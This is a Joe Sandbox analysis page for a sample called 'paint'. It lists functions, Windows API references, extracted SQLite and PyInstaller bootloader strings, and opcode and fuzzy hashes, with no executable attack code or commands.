Snapshot File: hcaresult_1_2_7ffdfab20000_paint.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: )tP
API String ID: 3300690313-3907340667
Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
Instruction ID: a94b0584e2db536b9d84207e458638f7668ad69a9f5287f9d326c9aa4e9267f5
Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
Instruction Fuzzy Hash: AA62282272919286E7158F38D5106BD77E0F749786F045532EEAEC37D8EA3CEA49D700

Function 00007FFDFB0E4CF0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 370COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0E4F7D
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0E502E

Strings

out of memory, xrefs: 00007FFDFB0E4DDF
database schema is locked: %s, xrefs: 00007FFDFB0E4ED6
statement too long, xrefs: 00007FFDFB0E4F33

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: database schema is locked: %s$out of memory$statement too long
API String ID: 4225454184-1046679716
Opcode ID: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
Instruction ID: e4b0b5e2de52c4d5b39eb3d202f1dc8feb9e8110bdcf37ba334f242c81bea34f
Opcode Fuzzy Hash: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
Instruction Fuzzy Hash: FDF19822B0A68386EB24DF219434BBE6790FB86B88F084535DA5D077E9DF7CE5419740

Function 00007FFDFB892230 Relevance: 6.9, APIs: 4, Instructions: 900librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDFB892D59
GetProcAddress.KERNEL32 ref: 00007FFDFB892D83
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFDFB892E0D
VirtualProtect.KERNEL32 ref: 00007FFDFB892E2B

Memory Dump Source

Source File: 00000001.00000002.2016511433.00007FFDFB892000.00000080.00000001.01000000.00000005.sdmp, Offset: 00007FFDFB1E0000, based on PE: true

Associated: 00000001.00000002.2015733391.00007FFDFB1E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2015768208.00007FFDFB1E1000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2015768208.00007FFDFB484000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2015768208.00007FFDFB48F000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2015768208.00007FFDFB505000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2015768208.00007FFDFB5D0000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2015768208.00007FFDFB6D1000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2015768208.00007FFDFB6D4000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2015768208.00007FFDFB7CF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2015768208.00007FFDFB7D9000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2015768208.00007FFDFB851000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2015768208.00007FFDFB885000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2016544721.00007FFDFB893000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb1e0000_paint.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: 20bc69a4286804e3faafccbb8ca4eb16e2df685c1e5aaf2263807ad93f74b24b
Instruction ID: 317e18f88d8d32b3f417d0368fc23e979a4705c916aecd9d0f10acad6f45b707
Opcode Fuzzy Hash: 20bc69a4286804e3faafccbb8ca4eb16e2df685c1e5aaf2263807ad93f74b24b
Instruction Fuzzy Hash: 2F62292273919786FB159F38D4106BD7A90F788B89F045531EAAED37D8E63CEA45C700

Function 00007FFDFB0822E0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 586COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB082498

Strings

:memory:, xrefs: 00007FFDFB082346

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: :memory:
API String ID: 4225454184-2920599690
Opcode ID: 3d2ec196a22088dfc73d8977262f4631dc352476567c5fa5db6760948f71a506
Instruction ID: c5137fcdaee127001dd430ec84e897f7fd849c40ad13cdca2e643f990df39835
Opcode Fuzzy Hash: 3d2ec196a22088dfc73d8977262f4631dc352476567c5fa5db6760948f71a506
Instruction Fuzzy Hash: 1E426162F0AB8386EB659F15A460B7967A0FF56B48F048135CA6E037F9DF3CE5949300

Function 00007FF6F0BD92F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF6F0BD9323
FindClose.KERNEL32 ref: 00007FF6F0BD9332

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: fbfd0f38adec2e3a5c335ca5765c14d5955c3f924ee9959431f62da887e86d82
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: D4F0C866A19742C6F7A08BA0B459766B351AB89338F840335DA7E427D4EF3CD049CB00

Function 00007FFDFB071240 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FFDFB071265

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
Instruction ID: eeba87f3e2091aea78d9c0486b70b38b1cfe7f06a19fd2cae5b2d4a84bc6800a
Opcode Fuzzy Hash: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
Instruction Fuzzy Hash: 8CA1C4A2F0BB4781EF588B45B874AB4A2A4FF46B48F640535C92E467F8DF7CE4959200

Function 00007FF6F0BD1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6F0BD7F80: _fread_nolock.LIBCMT ref: 00007FF6F0BD802A

_fread_nolock.LIBCMT ref: 00007FF6F0BD1A1B

Part of subcall function 00007FF6F0BD2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6F0BD1B6A), ref: 00007FF6F0BD295E

Strings

Could not allocate buffer for TOC!, xrefs: 00007FF6F0BD1B1B
Error on file., xrefs: 00007FF6F0BD1B8D
Failed to seek to cookie position!, xrefs: 00007FF6F0BD19EE
Could not read full TOC!, xrefs: 00007FF6F0BD1B55
calloc, xrefs: 00007FF6F0BD1A68
fseek, xrefs: 00007FF6F0BD19F5
fread, xrefs: 00007FF6F0BD1A32, 00007FF6F0BD1B5C
malloc, xrefs: 00007FF6F0BD1B22
Could not allocate memory for archive structure!, xrefs: 00007FF6F0BD1A61
Failed to read cookie!, xrefs: 00007FF6F0BD1A2B
MEI, xrefs: 00007FF6F0BD1991

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: cd0a3765df11f2bbfda315c56b798e358636bbaa146f7382309ff43e7b9542cf
Instruction ID: e528fdf8846a88169fbcff59631d6b632cad717047f6798f0291ed39d8d2b1f2
Opcode Fuzzy Hash: cd0a3765df11f2bbfda315c56b798e358636bbaa146f7382309ff43e7b9542cf
Instruction Fuzzy Hash: AE819171A1D683B5EB20DB24D0406B963A2EF46784F844431E9AFC77C5FE3EE5858740

Function 00007FF6F0BD1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF6F0BD149F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6F0BD14DE
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6F0BD15DF
fseek, xrefs: 00007FF6F0BD14E5
fread, xrefs: 00007FF6F0BD15E6
malloc, xrefs: 00007FF6F0BD151F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6F0BD1518

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: d93f19cd1d84b14fa0365c41b42ee9721bcb5a53f9100330deb0bb0610ffab13
Instruction ID: 6bba4a8ddf6175e95ce4486ca9e9fecd103b7d935a5f7fea0a559699a4d64032
Opcode Fuzzy Hash: d93f19cd1d84b14fa0365c41b42ee9721bcb5a53f9100330deb0bb0610ffab13
Instruction Fuzzy Hash: C9418F21A09643B5EB10DB61A4005B9A395EF96788FC44932EE2F87BD5FF3EE541C740

Function 00007FFDFB0E4450 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB0E45D9

Strings

ase, xrefs: 00007FFDFB0E46DD
CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text), xrefs: 00007FFDFB0E44F4
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 00007FFDFB0E47CF
table, xrefs: 00007FFDFB0E447A
sqlite_master, xrefs: 00007FFDFB0E449C
sqlite_temp_master, xrefs: 00007FFDFB0E4495

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
API String ID: 4225454184-879093740
Opcode ID: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
Instruction ID: 16958a682c656dc8667ae6e4193b033090426f02f537b68000300b1bf5ccc0b2
Opcode Fuzzy Hash: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
Instruction Fuzzy Hash: 5EE1AD22F0AA938AFB14CF249560ABD27A5FB46B88F054235DE6C177E9DF38E451D340

Function 00007FF6F0BD1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1.3.1, xrefs: 00007FF6F0BD1249
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6F0BD12BA
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6F0BD1276
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6F0BD12EF
malloc, xrefs: 00007FF6F0BD12C1, 00007FF6F0BD12F6
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6F0BD141E

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: fe104055da117a3a3034f39fc0baffbe32c7d20989838b959021b68ce5af3fc8
Instruction ID: 6dd0c5d2f4590058812d6be86454b319aa5443a4d6a3686f20d72fa56823c257
Opcode Fuzzy Hash: fe104055da117a3a3034f39fc0baffbe32c7d20989838b959021b68ce5af3fc8
Instruction Fuzzy Hash: A251C322A09683B1E760AB51A4003BAA292BF86794FC44535ED6FC77C5FF3EE545CB00

Function 00007FF6F0BD36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6F0BD3804), ref: 00007FF6F0BD36E1
GetLastError.KERNEL32(?,00007FF6F0BD3804), ref: 00007FF6F0BD36EB

Part of subcall function 00007FF6F0BD2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2C9E
Part of subcall function 00007FF6F0BD2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2D63
Part of subcall function 00007FF6F0BD2C50: MessageBoxW.USER32 ref: 00007FF6F0BD2D99

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF6F0BD3790
Failed to resolve full path to executable %ls., xrefs: 00007FF6F0BD3739
GetModuleFileNameW, xrefs: 00007FF6F0BD36FA
Failed to obtain executable path., xrefs: 00007FF6F0BD36F3
\\?\, xrefs: 00007FF6F0BD375A

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: 48a944b1a3723ab8dc99759e717684d722368117d21705db7aea60a2791280b3
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: F121A091B09A42A0FB209B20E9143B6A256BF4A785FC04132D67FC37D6FE2EE505C304

Function 00007FF6F0BEBACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BEBEF9

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: ba46bac31fe72f1dd681b3566344db0dd8f54c3f22ac6e326a6392c95ac81308
Instruction ID: 73fb2b25bce6f392b6c5ee5329a1ff902d42fe0b2e44128e6a0fe611d107e5b1
Opcode Fuzzy Hash: ba46bac31fe72f1dd681b3566344db0dd8f54c3f22ac6e326a6392c95ac81308
Instruction Fuzzy Hash: 7CC1E522A0C687E1E7608B159440ABE77A4EF82B80FD54171EA6F837D1EF7EE8558740

Function 00007FFDFB098FF0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFE1A463010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFDFB0DD120), ref: 00007FFDFB09918D

Strings

API called with NULL prepared statement, xrefs: 00007FFDFB099004
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB09903A
API called with finalized prepared statement, xrefs: 00007FFDFB09901C
%s at line %d of [%.10s], xrefs: 00007FFDFB099053
misuse, xrefs: 00007FFDFB099047

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
API String ID: 4225454184-3538577999
Opcode ID: 59009c79ba2879d59e095a4c0d238d051317fe434eef60da1c86e67d52254f2c
Instruction ID: 5d024da85a8c67f861d81da007607f10dd6bdb5610145622bb780fd27aa52eae
Opcode Fuzzy Hash: 59009c79ba2879d59e095a4c0d238d051317fe434eef60da1c86e67d52254f2c
Instruction Fuzzy Hash: F6519022B0F69385FB149B11D835AB96392BF86B98F484135DA7D073FDDE2CE442A340

Function 00007FF6F0BD6350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6F0BD63F7
ucrtbase.dll, xrefs: 00007FF6F0BD63CD
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6F0BD63B7
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF6F0BD6446
LoadLibrary, xrefs: 00007FF6F0BD649E
Failed to load Python DLL '%ls'., xrefs: 00007FF6F0BD6497

Memory Dump Source

Source File: 00000001.00000002.2013158606.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000001.00000002.2013118719.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013204446.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013273251.00007FF6F0C11000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2013345140.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 225581607e3d707b53bd1f97fb3ed329e7d5d5312be557a59bdbd84c876baa47
Instruction ID: 000d3c0ba2a76c19acdfa3f92c70f1ba62d85c5c89aa60ed4ccaf1b4f31aef85
Opcode Fuzzy Hash: 225581607e3d707b53bd1f97fb3ed329e7d5d5312be557a59bdbd84c876baa47
Instruction Fuzzy Hash: 04418025A19687B1EB21DB64E4152E9A326FF56344FC00132EA6E837D6FF3DE505C740

Function 00007FFDFB06FFE0 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 409fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FFDFB07021A

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFDFB0702F6
psow, xrefs: 00007FFDFB070591
exclusive, xrefs: 00007FFDFB0701AB
winOpen, xrefs: 00007FFDFB07048D

Memory Dump Source

Source File: 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB060000, based on PE: true

Associated: 00000001.00000002.2015020570.00007FFDFB060000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1C3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015138259.00007FFDFB1D8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015663978.00007FFDFB1DA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2015698265.00007FFDFB1DC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb060000_paint.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
Instruction ID: aa6497b053ff5a2fa05fc76d44aa7e830e98277b1f477c277abf5d5b64df4b93
Opcode Fuzzy Hash: cae0b00cb7096171bd09e9f8f13f6bf005522bc53666c8e9a3692a454be1cbcc
Instruction Fuzzy Hash: 5C028F62F0A68386FB558F11B870EB9A3A0FF85B58F144235D96E826F8DF3CE4459704

Function 00007FFDFB06D9F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110fileCOMMON

Download Yara Rule

APIs

